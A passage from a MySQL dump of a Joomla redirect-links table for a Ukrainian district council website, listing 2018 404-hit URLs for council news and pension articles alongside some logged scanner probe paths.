01:12:35','0000-00-00 00:00:00',301),(32459,'http://malyn-rayrada.gov.ua/wp-content/themes/twentyfifteen/content.php',NULL,'','',1,0,'2018-10-24 16:25:42','0000-00-00 00:00:00',301),(32460,'http://www.malyn-rayrada.gov.ua/xmlrpz.php',NULL,'','',1,0,'2018-10-24 21:30:50','0000-00-00 00:00:00',301),(32461,'http://malyn-rayrada.gov.ua/wp-content/themes/bloggingcream/404.php',NULL,'','',1,0,'2018-10-25 07:26:07','0000-00-00 00:00:00',301),(32462,'http://www.malyn-rayrada.gov.ua/wp-load.php',NULL,'','',1,0,'2018-10-25 19:39:10','0000-00-00 00:00:00',301),(32463,'http://malyn-rayrada.gov.ua/wp-content/themes/default/404.php',NULL,'','',1,0,'2018-10-25 23:02:37','0000-00-00 00:00:00',301),(32464,'http://malyn-rayrada.gov.ua/wp-content/themes/agregado/404.php',NULL,'','',1,0,'2018-10-26 15:00:42','0000-00-00 00:00:00',301),(32465,'http://malyn-rayrada.gov.ua/wp-content/themes/cherryframework/404.php',NULL,'','',1,0,'2018-10-27 07:15:53','0000-00-00 00:00:00',301),(32466,'https://malyn-rayrada.gov.ua/wp-content/themes/twentyfifteen/index.php',NULL,'','',1,0,'2018-10-27 23:46:26','0000-00-00 00:00:00',301),(32467,'https://malyn-rayrada.gov.ua/index.php/1653-z-dnem-sobornosti?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2018-10-28 00:58:02','0000-00-00 00:00:00',301),(32468,'https://malyn-rayrada.gov.ua/index.php/1687-informatsiya-iz-sportivnikh-zmagan',NULL,'','',85,0,'2018-10-28 02:06:40','0000-00-00 00:00:00',301),(32469,'https://www.malyn-rayrada.gov.ua/index.php/1979-provedennya-pererakhunku-pensij-bez-dodatkovogo-zvernennya-z-1-kvitnya-potochnogo-roku-abo-pro-novatsiji-pererakhunku-pensij-pratsyuyuchim-pensioneram',NULL,'','',22,0,'2018-10-28 10:07:01','0000-00-00 00:00:00',301),(32470,'https://www.malyn-rayrada.gov.ua/index.php/1545-vshanuvali-lyudej-pokhilogo-viku?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-10-28 11:32:42','0000-00-00 00:00:00',301),(32471,'https://www.malyn-rayrada.gov.ua/index.php/1554-proekt-strategiji-podolannya-naslidkiv-chornobilskoji-katastrofi-ta-vidrodzhennya-teritorij-shcho-zaznali-radioaktivnogo-zabrudnennya?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-10-28 11:32:48','0000-00-00 00:00:00',301),(32472,'https://www.malyn-rayrada.gov.ua/index.php/1560-dosit-vdalo-vistupili-nashi-bortsi-vilnogo-stilyu?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-10-28 11:33:00','0000-00-00 00:00:00',301),(32473,'https://www.malyn-rayrada.gov.ua/index.php/1562-vitaemo-iz-svyatami-dnem-zakhisnika-ukrajini-ta-pokrovoyu-presvyatoji-bogoroditsi-2?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-10-28 11:33:03','0000-00-00 00:00:00',301),(32474,'https://www.malyn-rayrada.gov.ua/index.php/1566-viddil-kulturi-malinskoji-rajderzhadministratsiji-ogoloshue-pro-namir-peredati-nerukhome-majno-v-orendu?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-10-28 11:33:06','0000-00-00 00:00:00',301),(32475,'https://www.malyn-rayrada.gov.ua/index.php/1573-vidbulas-10-sesiya-rajonnoji-radi?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-10-28 11:33:12','0000-00-00 00:00:00',301),(32476,'https://www.malyn-rayrada.gov.ua/index.php/1587-upravlinnya-pensijnogo-fondu-ukrajini-v-malinskomu-rajoni-zhitomirskoji-oblasti-informue-3?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-10-28 11:33:20','0000-00-00 00:00:00',301),(32477,'https://www.malyn-rayrada.gov.ua/index.php/1609-vidbulas-13-pozachergova-sesiya-rajonnoji-radi?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-10-28 11:33:27','0000-00-00 00:00:00',301),(32478,'https://www.malyn-rayrada.gov.ua/index.php/1616-chempionat-oblasti-z-vilnoji-borotbi?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-10-28 11:33:31','0000-00-00 00:00:00',301),(32479,'https://www.malyn-rayrada.gov.ua/index.php/1637-pro-osoblivosti-viplati-pensij-za-sichen-2017-roku?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-10-28 11:33:34','0000-00-00 00:00:00',301),(32480,'https://www.malyn-rayrada.gov.ua/index.php/1639-zvernennya-upravlinnya-sb-ukrajini-do-zhiteliv-ta-gostej-zhitomira-i-oblasti?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-10-28 11:33:37','0000-00-00 00:00:00',301),(32481,'https://www.malyn-rayrada.gov.ua/index.php/1650-zakonodavchi-zmini-do-deyakikh-normativno-pravovikh-aktiv-u-sferi-zagalnoobov-yazkovogo-derzhavnogo-pensijnogo-strakhuvannya-z-1-sichnya-2017-roku?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-10-28 11:33:57','0000-00-00 00:00:00',301),(32482,'https://www.malyn-rayrada.gov.ua/index.php/1650-zakonodavchi-zmini-do-deyakikh-normativno-pravovikh-aktiv-u-sferi-zagalnoobov-yazkovogo-derzhavnogo-pensijnogo-strakhuvannya-z-1-sichnya-2017-roku?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2018-10-28 11:34:02','0000-00-00 00:00:00',301),(32483,'https://www.malyn-rayrada.gov.ua/index.php/1655-nashi-sportsmeni-pokazali-klas-2?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-10-28 11:34:07','0000-00-00 00:00:00',301),(32484,'https://www.malyn-rayrada.gov.ua/index.php/1655-nashi-sportsmeni-pokazali-klas-2?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2018-10-28 11:34:12','0000-00-00 00:00:00',301),(32485,'https://www.malyn-rayrada.gov.ua/index.php/1670-upravlinnya-pf-ukrajini-v-malinskomu-rajoni-informue?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-10-28 11:34:17','0000-00-00 00:00:00',301),(32486,'https://www.malyn-rayrada.gov.ua/index.php/1679-ogoloshennya-shchodo-komunalnogo-majna?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-10-28 11:34:20','0000-00-00 00:00:00',301),(32487,'https://malyn-rayrada.gov.ua/index.php/2091-plan-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-26-sesiyu-rajonnoji-radi-7-sklikannya',NULL,'','',42,0,'2018-10-28 12:12:57','0000-00-00 00:00:00',301),(32488,'https://www.malyn-rayrada.gov.ua/index.php/1544-uvaga-zasterezhennya?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-10-28 18:10:32','0000-00-00 00:00:00',301),(32489,'https://www.malyn-rayrada.gov.ua/index.php/1555-vidbuvsya-chempionat-zhitomirskoji-oblasti-z-boksu-sered-yunakiv?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-10-28 18:11:00','0000-00-00 00:00:00',301),(32490,'https://www.malyn-rayrada.gov.ua/index.php/1569-19-zhovtnya-na-bazi-malinskoji-dyussh-vidbuvsya-chempionat-rajonu-z-vilnoji-borotbi-sered-yunakiv-ta-divchat-2003-2006-r-n?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-10-28 18:11:06','0000-00-00 00:00:00',301),(32491,'https://www.malyn-rayrada.gov.ua/index.php/1578-bazhaemo-egoru-peremogi-na-chempionati-evropi?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-10-28 18:11:10','0000-00-00 00:00:00',301),(32492,'https://www.malyn-rayrada.gov.ua/index.php/1585-kerivnik-rajonnoji-dyussh-anatolij-tishchenko-informue?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-10-28 18:11:25','0000-00-00 00:00:00',301),(32493,'https://www.malyn-rayrada.gov.ua/index.php/1588-informatsiya-shchodo-pidvishchennya-pensij?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-10-28 18:11:28','0000-00-00 00:00:00',301),(32494,'https://www.malyn-rayrada.gov.ua/index.php/1589-obchislennya-stazhu-shcho-dae-pravo-na-priznachennya-pensiji-za-vikom-na-pilgovikh-umovakh-za-spiskom-1-ta-2?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-10-28 18:11:33','0000-00-00 00:00:00',301),(32495,'https://www.malyn-rayrada.gov.ua/index.php/1651-informatsiya-shchodo-nadkhodzhennya-dokhodiv-v-rozrizi-rajoniv-oblasti-za-2016-rik?tmpl=component&print=1&layout=default',NULL,'','',2,0,'2018-10-28 18:12:09','0000-00-00 00:00:00',301),(32496,'https://www.malyn-rayrada.gov.ua/index.php/1652-ogoloshennya-pro-orendu-majna?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-10-28 18:12:13','0000-00-00 00:00:00',301),(32497,'https://www.malyn-rayrada.gov.ua/index.php/1653-z-dnem-sobornosti?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-10-28 18:12:21','0000-00-00 00:00:00',301),(32498,'https://www.malyn-rayrada.gov.ua/index.php/1657-optimizatsiya-ta-tsentralizatsiya-funktsij-vazhlivij-krok-do-pokrashchennya-roboti-organiv-pfu',NULL,'','',35,0,'2018-10-28 18:12:26','0000-00-00 00:00:00',301),(32499,'https://www.malyn-rayrada.gov.ua/index.php/1687-informatsiya-iz-sportivnikh-zmagan?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-10-28 18:12:44','0000-00-00 00:00:00',301);
INSERT INTO `fw3gt_redirect_links` VALUES (32500,'https://www.malyn-rayrada.gov.ua/index.php/1695-malinskij-rajonnij-viddil-z-pitan-probatsiji-tsentralnogo-mizhregionalnogo-upravlinnya-z-pitan-vikonannya-kriminalnikh-pokaran-ta-probatsiji-ministerstva-yustitsiji?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-10-28 18:12:55','0000-00-00 00:00:00',301),(32501,'https://www.malyn-rayrada.gov.ua/index.php/1715-ogoloshennya-2?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-10-28 18:13:46','0000-00-00 00:00:00',301),(32502,'https://www.malyn-rayrada.gov.ua/index.php/1717-novini-iz-sportivnikh-zmagan?tmpl=component&print=1&layout=default',NULL,'','',2,0,'2018-10-28 18:13:52','0000-00-00 00:00:00',301),(32503,'https://www.malyn-rayrada.gov.ua/index.php/1720-zakonodavchi-zmini-v-pensijnomu-zabezpechenni-z-01-05-2017?tmpl=component&print=1&layout=default',NULL,'','',2,0,'2018-10-28 18:13:57','0000-00-00 00:00:00',301),(32504,'https://www.malyn-rayrada.gov.ua/index.php/1725-viddil-kulturi-malinskoji-rajderzhadministratsiji-ogoloshue-pro-namir-peredati-nerukhome-majno-v-orendu-2?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-10-28 18:14:03','0000-00-00 00:00:00',301),(32505,'https://www.malyn-rayrada.gov.ua/index.php/1828-do-vidoma-pensioneriv-2',NULL,'','',21,0,'2018-10-28 18:17:02','0000-00-00 00:00:00',301),(32506,'https://www.malyn-rayrada.gov.ua/index.php/1829-pro-pidvishchennya-rozmiriv-pensij-z-zhovtnya-potochnogo-roku-ta-vprovadzhennya-pensijnoji-reformi',NULL,'','',17,0,'2018-10-28 18:17:09','0000-00-00 00:00:00',301),(32507,'https://www.malyn-rayrada.gov.ua/index.php/1830-malinski-pensioneri-vzhe-pochali-otrimuvati-pidvishcheni-pensiji-cherez-bank-ta-poshtu',NULL,'','',15,0,'2018-10-28 18:17:16','0000-00-00 00:00:00',301),(32508,'https://malyn-rayrada.gov.ua/attachments/article/1879/додаток',NULL,'','',2,0,'2018-10-28 20:06:46','0000-00-00 00:00:00',301),(32509,'https://malyn-rayrada.gov.ua/wp-login.php',NULL,'','',227,0,'2018-10-29 07:29:25','0000-00-00 00:00:00',301),(32510,'https://malyn-rayrada.gov.ua/.git/head',NULL,'','',34,0,'2018-10-29 09:30:22','0000-00-00 00:00:00',301),(32511,'https://malyn-rayrada.gov.ua/index.php/1656-ogoloshennya-pro-konkurs-na-zamishchennya-vakantnoji-posadi-direktora-komunalnogo-zakladu-rajonnij-budinok-kulturi-malinskoji-rajonnoji-radi',NULL,'','',52,0,'2018-10-29 14:49:34','0000-00-00 00:00:00',301),(32512,'https://malyn-rayrada.gov.ua/index.php/2015-shchodo-zaprovadzhennya-sistemi-haccp-u-zakladakh-gromadskogo-kharchuvannya',NULL,'','',29,0,'2018-10-29 15:18:30','0000-00-00 00:00:00',301),(32513,'https://www.malyn-rayrada.gov.ua/index.php/1424-pro-sklikannya-6-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',5,0,'2018-10-29 21:20:01','0000-00-00 00:00:00',301),(32514,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1792-pro-vnesennya-zmin-do-rajonnogo-byudzhetu-na-2017-rik',NULL,'','',1,0,'2018-10-30 11:05:18','0000-00-00 00:00:00',301),(32515,'https://malyn-rayrada.gov.ua/index.php/1653-z-dnem-sobornosti',NULL,'','',40,0,'2018-10-30 12:08:33','0000-00-00 00:00:00',301),(32516,'https://www.malyn-rayrada.gov.ua/index.php/1555-vidbuvsya-chempionat-zhitomirskoji-oblasti-z-boksu-sered-yunakiv',NULL,'','',23,0,'2018-10-30 12:20:11','0000-00-00 00:00:00',301),(32517,'https://www.malyn-rayrada.gov.ua/index.php/2015-shchodo-zaprovadzhennya-sistemi-haccp-u-zakladakh-gromadskogo-kharchuvannya',NULL,'','',16,0,'2018-10-30 12:21:05','0000-00-00 00:00:00',301),(32518,'https://www.malyn-rayrada.gov.ua/index.php/1503-malinski-podatkivtsi-informuyut',NULL,'','',7,0,'2018-10-30 13:50:17','0000-00-00 00:00:00',301),(32519,'https://malyn-rayrada.gov.ua/index.php/1695-malinskij-rajonnij-viddil-z-pitan-probatsiji-tsentralnogo-mizhregionalnogo-upravlinnya-z-pitan-vikonannya-kriminalnikh-pokaran-ta-probatsiji-ministerstva-yustitsiji',NULL,'','',102,0,'2018-10-30 17:00:51','0000-00-00 00:00:00',301),(32520,'https://malyn-rayrada.gov.ua/index.php/1825-plan-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-20-sesiyu-rajonnoji-radi-7-sklikannya',NULL,'','',7,0,'2018-10-31 01:39:42','0000-00-00 00:00:00',301),(32521,'https://malyn-rayrada.gov.ua/index.php/1655-nashi-sportsmeni-pokazali-klas-2',NULL,'','',56,0,'2018-10-31 02:11:28','0000-00-00 00:00:00',301),(32522,'https://malyn-rayrada.gov.ua/wp-includes/indes.php',NULL,'','',1,0,'2018-10-31 03:59:36','0000-00-00 00:00:00',301),(32523,'https://malyn-rayrada.gov.ua/index.php/1608-nagorodzhennya-chempiona-fk-budivelnik-granitne',NULL,'','',45,0,'2018-10-31 11:37:07','0000-00-00 00:00:00',301),(32524,'https://malyn-rayrada.gov.ua/index.php/1651-informatsiya-shchodo-nadkhodzhennya-dokhodiv-v-rozrizi-rajoniv-oblasti-za-2016-rik',NULL,'','',28,0,'2018-10-31 11:38:16','0000-00-00 00:00:00',301),(32525,'https://malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/11-2010-06-05-12-54-02',NULL,'','',133,0,'2018-10-31 12:10:45','0000-00-00 00:00:00',301),(32526,'https://malyn-rayrada.gov.ua/index.php/2042-pro-sklikannya-25-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',57,0,'2018-10-31 12:44:16','0000-00-00 00:00:00',301),(32527,'https://malyn-rayrada.gov.ua/index.php/1609-vidbulas-13-pozachergova-sesiya-rajonnoji-radi',NULL,'','',20,0,'2018-10-31 13:11:40','0000-00-00 00:00:00',301),(32528,'https://malyn-rayrada.gov.ua/index.php/1616-chempionat-oblasti-z-vilnoji-borotbi?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-10-31 13:12:11','0000-00-00 00:00:00',301),(32529,'https://malyn-rayrada.gov.ua/index.php/1829-pro-pidvishchennya-rozmiriv-pensij-z-zhovtnya-potochnogo-roku-ta-vprovadzhennya-pensijnoji-reformi',NULL,'','',65,0,'2018-10-31 13:13:47','0000-00-00 00:00:00',301),(32530,'https://malyn-rayrada.gov.ua/index.php/1830-malinski-pensioneri-vzhe-pochali-otrimuvati-pidvishcheni-pensiji-cherez-bank-ta-poshtu',NULL,'','',57,0,'2018-10-31 13:13:58','0000-00-00 00:00:00',301),(32531,'https://malyn-rayrada.gov.ua/index.php/2010-06-05-12-55-45/10-2010-06-05-12-53-35',NULL,'','',105,0,'2018-10-31 13:29:45','0000-00-00 00:00:00',301),(32532,'https://www.malyn-rayrada.gov.ua/index.php/1554-proekt-strategiji-podolannya-naslidkiv-chornobilskoji-katastrofi-ta-vidrodzhennya-teritorij-shcho-zaznali-radioaktivnogo-zabrudnennya?tmpl=component&print=1&layout=default&page=',NULL,'','',1,0,'2018-10-31 13:31:02','0000-00-00 00:00:00',301),(32533,'https://www.malyn-rayrada.gov.ua/index.php/1827-vistup-yunikh-bortsiv?tmpl=component&print=1&layout=default',NULL,'','',1,0,'2018-10-31 13:31:56','0000-00-00 00:00:00',301),(32534,'https://malyn-rayrada.gov.ua/index.php/1779-plan-grafik-provedennya-zasidan-postijnikh-komisij-malinskoji-rajonnoji-radi-po-rozglyadu-pitan-yaki-vinosyatsya-na-18-sesiyu-rajonnoji-radi-7-sklikannya',NULL,'','',6,0,'2018-10-31 14:46:53','0000-00-00 00:00:00',301),(32535,'https://www.malyn-rayrada.gov.ua/index.php/rishennja-radi/proekti-rishen/1728-pro-zatverdzhennya-rozporyadzhennya-golovi-rajonnoji-derzhavnoji-administratsiji',NULL,'','',6,0,'2018-10-31 15:13:59','0000-00-00 00:00:00',301),(32536,'https://www.malyn-rayrada.gov.ua/index.php/1447-informatsijne-povidomlennya-pro-ogoloshennya-konkursu-z-vidboru-sub-ektiv-diyalnosti-dlya-provedennya-kapitalnikh-remontiv-ob-ektiv-spilnoji-vlasnosti-teritorialnikh-gromad-sil-selishch-rajonu',NULL,'','',1,0,'2018-10-31 17:12:30','0000-00-00 00:00:00',301),(32537,'https://malyn-rayrada.gov.ua/wp-content/indes.php',NULL,'','',1,0,'2018-10-31 18:13:08','0000-00-00 00:00:00',301),(32538,'https://malyn-rayrada.gov.ua/index.php/1827-vistup-yunikh-bortsiv',NULL,'','',42,0,'2018-10-31 20:46:20','0000-00-00 00:00:00',301),(32539,'https://malyn-rayrada.gov.ua/index.php/1532-dlya-shkolyariv-lyubovitskoji-gromadi-tezh-prodzveniv-pershij-dzvinok',NULL,'','',65,0,'2018-10-31 21:11:43','0000-00-00 00:00:00',301),(32540,'https://malyn-rayrada.gov.ua/attachments/article/2101/ð¿ñ–ð´ñ ñƒð¼ðºð¸ ð³ð¾ð»ð¾ñ ñƒð²ð°ð½ð½ñ .pdf',NULL,'','',2,0,'2018-11-01 04:41:16','0000-00-00 00:00:00',301),(32541,'https://malyn-rayrada.gov.ua/attachments/article/2/ð”ðµðºð»ð°ñ€ð°ñ†ñ–ñ  ð ð¸ñ‡ð¸ð¿ð¾ñ€ðµð½ðºð¾ ð·ð° 2015 ñ€ñ–ðº.pdf',NULL,'','',2,0,'2018-11-01 05:36:20','0000-00-00 00:00:00',301),(32542,'https://malyn-rayrada.gov.ua/attachments/article/2/ð”ðµðºð»ð°ñ€ð°ñ†ñ–ñ  ð›ðµð²ðºð¾ð²ðµñ†ñœ.pdf',NULL,'','',2,0,'2018-11-01 05:37:59','0000-00-00 00:00:00',301),(32543,'https://malyn-rayrada.gov.ua/index.php/1246-granitnenska-selishchna-rada-informue',NULL,'http://malyn-rayrada.gov.ua/index.php/1246-granitnenska-selishchna-rada-informue','',13,0,'2018-11-01 06:33:55','0000-00-00 00:00:00',301),(32544,'https://malyn-rayrada.gov.ua/assets/images/search.php',NULL,'','',7,0,'2018-11-01 08:33:09','0000-00-00 00:00:00',301),(32545,'https://malyn-rayrada.gov.ua/index.php/1615-afrikanska-chuma-svinej-na-zhitomirshchini',NULL,'','',59,0,'2018-11-01 09:49:48','0000-00-00 00:00:00',301),(32546,'https://malyn-rayrada.gov.ua/index.php/1981-za-kozhnoyu-khustkoyu-zhittya-zhinki',NULL,'','',27,0,'2018-11-01 10:30:07','0000-00-00 00:00:00',301),(32547,'https://malyn-rayrada.gov.ua/index.php/1640-vitaemo-z-zhiteliv-malinshchini-z-novim-rokom-ta-rizdvom-khristovim',NULL,'','',47,0,'2018-11-01 10:34:04','0000-00-00 00:00:00',301),(32548,'https://malyn-rayrada.gov.ua/index.php/1652-ogoloshennya-pro-orendu-majna',NULL,'','',19,0,'2018-11-01 10:35:03','0000-00-00 00:00:00',301),(32549,'https://malyn-rayrada.gov.ua/index.php/1725-viddil-kulturi-malinskoji-rajderzhadministratsiji-ogoloshue-pro-namir-peredati-nerukhome-majno-v-orendu-2',NULL,'','',36,0,'2018-11-01 10:42:47','0000-00-00 00:00:00',301),(32550,'https://malyn-rayrada.gov.ua/index.php/1585-kerivnik-rajonnoji-dyussh-anatolij-tishchenko-informue',NULL,'','',50,0,'2018-11-01 10:45:17','0000-00-00 00:00:00',301),(32551,'https://malyn-rayrada.gov.ua/index.php/1657-optimizatsiya-ta-tsentralizatsiya-funktsij-vazhlivij-krok-do-pokrashchennya-roboti-organiv-pfu',NULL,'','',50,0,'2018-11-01 10:45:51','0000-00-00 00:00:00',301),(32552,'https://malyn-rayrada.gov.ua/index.php/1984-vistup-nashikh-bortsiv-u-korosteni-2',NULL,'','',54,0,'2018-11-01 10:56:28','0000-00-00 00:00:00',301),(32553,'https://malyn-rayrada.gov.ua/index.php/1541-den-sela-v-novikh-vorob-yakh-fotoreportazh',NULL,'','',60,0,'2018-11-01 11:22:04','0000-00-00 00:00:00',301),(32554,'https://malyn-rayrada.gov.ua/index.php/1546-vibori-pirizhkivskogo-silskogo-golovi-4-grudnya-2016-roku',NULL,'','',43,0,'2018-11-01 13:25:55','0000-00-00 00:00:00',301),(32555,'https://malyn-rayrada.gov.ua/index.php/2057-kharchovi-otruennya-ta-jikh-profilaktika',NULL,'','',47,0,'2018-11-01 15:59:32','0000-00-00 00:00:00',301),(32556,'https://malyn-rayrada.gov.ua/index.php/2045-vitaemo-iz-svyatom-dnem-konstitutsiji-ukrajini',NULL,'','',56,0,'2018-11-01 18:05:16','0000-00-00 00:00:00',301),(32557,'https://malyn-rayrada.gov.ua/index.php/1525-z-dnem-derzhavnogo-prapora-ukrajini',NULL,'','',59,0,'2018-11-01 18:09:49','0000-00-00 00:00:00',301),(32558,'https://malyn-rayrada.gov.ua/index.php/1979-provedennya-pererakhunku-pensij-bez-dodatkovogo-zvernennya-z-1-kvitnya-potochnogo-roku-abo-pro-novatsiji-pererakhunku-pensij-pratsyuyuchim-pensioneram',NULL,'','',53,0,'2018-11-01 18:14:07','0000-00-00 00:00:00',301),(32559,'https://malyn-rayrada.gov.ua/index.php/1991-oberezhno-klishchi',NULL,'','',52,0,'2018-11-01 18:14:13','0000-00-00 00:00:00',301),(32560,'https://malyn-rayrada.gov.ua/index.php/2041-vidnosno-pitannya-pererakhunku-pensij-z-1-lipnya-2018-roku',NULL,'','',56,0,'2018-11-01 18:20:59','0000-00-00 00:00:00',301),(32561,'https://malyn-rayrada.gov.ua/index.php/1665-z-1-sichnya-startuvala-deklaratsijna-kampaniya-2018',NULL,'','',82,0,'2018-11-01 18:29:20','0000-00-00 00:00:00',301),(32562,'https://malyn-rayrada.gov.ua/index.php/1717-novini-iz-sportivnikh-zmagan',NULL,'','',22,0,'2018-11-01 18:29:52','0000-00-00 00:00:00',301),(32563,'https://malyn-rayrada.gov.ua/index.php/1720-zakonodavchi-zmini-v-pensijnomu-zabezpechenni-z-01-05-2017',NULL,'','',42,0,'2018-11-01 18:39:41','0000-00-00 00:00:00',301),(32564,'https://malyn-rayrada.gov.ua/index.php/1823-ogoloshennya-4',NULL,'','',76,0,'2018-11-01 18:59:36','0000-00-00 00:00:00',301),(32565,'https://malyn-rayrada.gov.ua/index.php/1544-uvaga-zasterezhennya',NULL,'','',60,0,'2018-11-01 19:25:16','0000-00-00 00:00:00',301),(32566,'https://malyn-rayrada.gov.ua/index.php/1828-do-vidoma-pensioneriv-2',NULL,'','',87,0,'2018-11-01 20:45:00','0000-00-00 00:00:00',301),(32567,'https://malyn-rayrada.gov.ua/index.php/1524-25-rokiv-nezalezhnosti',NULL,'','',60,0,'2018-11-02 00:17:44','0000-00-00 00:00:00',301),(32568,'https://malyn-rayrada.gov.ua/index.php/1578-bazhaemo-egoru-peremogi-na-chempionati-evropi',NULL,'','',35,0,'2018-11-02 01:21:05','0000-00-00 00:00:00',301),(32569,'https://malyn-rayrada.gov.ua/index.php/1536-vidbuvsya-turnir-iz-mini-futbolu',NULL,'','',65,0,'2018-11-02 03:57:15','0000-00-00 00:00:00',301),(32570,'https://malyn-rayrada.gov.ua/index.php/1978-dopomozhemo-oksani-gergalo',NULL,'','',34,0,'2018-11-02 09:13:47','0000-00-00 00:00:00',301),(32571,'https://malyn-rayrada.gov.ua/index.php/1715-ogoloshennya-2',NULL,'','',64,0,'2018-11-02 09:16:58','0000-00-00 00:00:00',301),(32572,'https://malyn-rayrada.gov.ua/index.php/1569-19-zhovtnya-na-bazi-malinskoji-dyussh-vidbuvsya-chempionat-rajonu-z-vilnoji-borotbi-sered-yunakiv-ta-divchat-2003-2006-r-n',NULL,'','',63,0,'2018-11-02 09:19:43','0000-00-00 00:00:00',301),(32573,'https://malyn-rayrada.gov.ua/index.php/1662-do-vidoma-robotodavtsiv',NULL,'','',40,0,'2018-11-02 09:20:35','0000-00-00 00:00:00',301),(32574,'https://malyn-rayrada.gov.ua/index.php/1980-shche-raz-pro-pererakhunki-pensijnikh-viplat-vijskovosluzhbovtsiv',NULL,'','',44,0,'2018-11-02 09:30:05','0000-00-00 00:00:00',301),(32575,'https://malyn-rayrada.gov.ua/index.php/1992-vikonannya-dokhidnoji-chastini-byudzhetiv-mist-rajoniv-ta-otg-za-pershij-kvartal-2018-roku',NULL,'','',53,0,'2018-11-02 10:10:02','0000-00-00 00:00:00',301),(32576,'https://www.malyn-rayrada.gov.ua/index.php/deputatska-storinka/2011-03-31-12-03-04/1777-analiz-vplivu-regulyatornogo-aktu-proektu-rishennya-malinskoji-rajonnoji-radi-pro-timchasovij-poryadok-vidalennya-derev-ta-kushchiv-za-mezhami-naselenikh-punktiv-na-teritoriji-malinskoji-rajonu',NULL,'','',12,0,'2018-11-02 11:08:40','0000-00-00 00:00:00',301),(32577,'https://malyn-rayrada.gov.ua/wp-content/plugins/log.php',NULL,'','',2,0,'2018-11-02 12:56:04','0000-00-00 00:00:00',301),(32578,'https://www.malyn-rayrada.gov.ua/index.php/1554-proekt-strategiji-podolannya-naslidkiv-chornobilskoji-katastrofi-ta-vidrodzhennya-teritorij-shcho-zaznali-radioaktivnogo-zabrudnennya',NULL,'','',17,0,'2018-11-02 13:26:10','0000-00-00 00:00:00',301),(32579,'https://www.malyn-rayrada.gov.ua/index.php/1715-ogoloshennya-2',NULL,'','',17,0,'2018-11-02 13:26:36','0000-00-00 00:00:00',301),(32580,'https://www.malyn-rayrada.gov.ua/attachments/article/1482/ð¿ñ€ð¾ñ‚ð¾ðºð¾ð» 2.pdf',NULL,'','',2,0,'2018-11-02 16:53:15','0000-00-00 00:00:00',301),(32581,'https://www.malyn-rayrada.gov.ua/attachments/article/1482/ð¿ñ€ð¾ñ‚ð¾ðºð¾ð» 1.pdf',NULL,'','',2,0,'2018-11-02 16:53:22','0000-00-00 00:00:00',301),(32582,'https://malyn-rayrada.gov.ua/index.php/1332-veselogo-rizdva',NULL,'','',6,0,'2018-11-02 16:55:06','0000-00-00 00:00:00',301),(32583,'https://www.malyn-rayrada.gov.ua/attachments/article/1706/ð¿ñ€ð¾ñ‚ð¾ðºð¾ð» ð±ñ–ð±ð»ñ–ð¾ñ‚ðµðºð°.pdf',NULL,'','',2,0,'2018-11-02 16:59:04','0000-00-00 00:00:00',301),(32584,'https://www.malyn-rayrada.gov.ua/attachments/article/1696/ð¿ñ€ð¾ñ‚ð¾ðºð¾ð» ð½2.pdf',NULL,'','',2,0,'2018-11-02 17:33:27','0000-00-00 00:00:00',301),(32585,'https://www.malyn-rayrada.gov.ua/attachments/article/1711/ð±ñ–ð±ð»ñ–ð¾ñ‚ðµðºð° ð¿ñ€ð¾ñ‚ð¾ðºð¾ð» 2.pdf',NULL,'','',2,0,'2018-11-02 17:36:40','0000-00-00 00:00:00',301),(32586,'https://www.malyn-rayrada.gov.ua/attachments/article/1696/ð¿ñ€ð¾ñ‚ð¾ðºð¾ð» ð½1.pdf',NULL,'','',2,0,'2018-11-02 17:40:19','0000-00-00 00:00:00',301),(32587,'https://malyn-rayrada.gov.ua//xmlrpc.php?rsd',NULL,'','',44,0,'2018-11-03 01:23:02','0000-00-00 00:00:00',301),(32588,'https://malyn-rayrada.gov.ua/wp-conde.php',NULL,'','',7,0,'2018-11-03 03:22:33','0000-00-00 00:00:00',301),(32589,'https://malyn-rayrada.gov.ua/index.php/1589-obchislennya-stazhu-shcho-dae-pravo-na-priznachennya-pensiji-za-vikom-na-pilgovikh-umovakh-za-spiskom-1-ta-2',NULL,'','',49,0,'2018-11-03 08:04:10','0000-00-00 00:00:00',301),(32590,'https://malyn-rayrada.gov.ua/index.php/1588-informatsiya-shchodo-pidvishchennya-pensij',NULL,'','',70,0,'2018-11-03 12:26:38','0000-00-00 